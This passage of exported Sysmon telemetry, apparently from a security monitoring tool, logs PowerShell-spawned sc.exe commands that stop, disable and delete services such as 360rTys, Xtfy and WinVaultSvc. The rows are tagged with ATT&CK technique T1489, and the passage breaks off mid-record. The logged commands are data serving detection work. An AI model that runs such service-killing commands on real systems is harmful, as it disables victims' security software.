MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.912634600Z"",""eventRecordID"":""2397"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.909\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010bf191e00}\r\nProcessId: 300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.909"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010bf191e00}"",""processId"":""300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.139",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.895 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f6181e00} +ProcessId: 7740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.898043800Z"",""eventRecordID"":""2396"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.895\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f6181e00}\r\nProcessId: 7740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.895"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010f6181e00}"",""processId"":""7740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.072",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.836 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001028161e00} +ProcessId: 3816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.840191200Z"",""eventRecordID"":""2393"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.836\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001028161e00}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.836"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001028161e00}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.025",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.784 
+ProcessGuid: {df9fc3d3-b379-5ecf-0000-001067131e00} +ProcessId: 2432 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.787371700Z"",""eventRecordID"":""2390"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.784\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001067131e00}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.784"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001067131e00}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:30.012",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.769 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001092121e00} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfya Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.774824500Z"",""eventRecordID"":""2389"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.769\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001092121e00}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.769"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001092121e00}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfya Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.978",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.736 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010d7101e00} +ProcessId: 5604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.738737800Z"",""eventRecordID"":""2387"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.736\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010d7101e00}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.736"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010d7101e00}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® 
Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.931",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.666 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010a10d1e00} +ProcessId: 7872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
